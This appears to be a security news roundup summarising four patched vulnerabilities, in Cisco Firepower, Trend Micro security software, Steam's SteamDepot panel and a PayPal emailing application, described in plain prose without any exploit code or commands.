Malware detection bypass vulnerability found in Cisco Firepower. Cisco released software updates fixing a high-severity vulnerability in its Firepower software, caused by improper input validation of fields in Hypertext Transfer Protocol (HTTP) headers, that could allow a remote, unauthenticated attacker to bypass the malicious file detection and blocking features by sending a crafted HTTP request to the affected system. 

Patch out for ‘ridiculous’ Trend Micro command execution vuln. Trend Micro released a patch fixing a command execution vulnerability in systems running its Maximum Security, Premium Security, or Password Manager software after a security researcher from Google’s Project Zero found that the software ran a remote debugging server on customers’ machines. Officials stated that the patch was not complete, but fixes the most critical issues with the software. 

XSS and CSRF bugs in Steam Dev panel let anyone be a Valve admin. A researcher from the United Kingdom discovered a cross-site scripting (XSS) vulnerability and a cross-site request forgery (CSRF) vulnerability in SteamDepot, Steam’s internal system for storing game content, after finding that malicious JavaScript placed in a description field could be used to steal users’ Steam cookies, among other actions. 

Security bug allowed attackers to send malicious emails via PayPal’s servers. PayPal Holdings, Inc., patched a flaw in one of its automatic emailing applications after a security researcher from Vulnerability Lab found that attackers could add malicious code to an account’s username, which was then embedded in the emails sent to other recipients. The flaw could allow an attacker to hijack sessions, redirect recipients to external sites, and trick users into clicking a malicious link that prompts them to enter their PayPal credentials.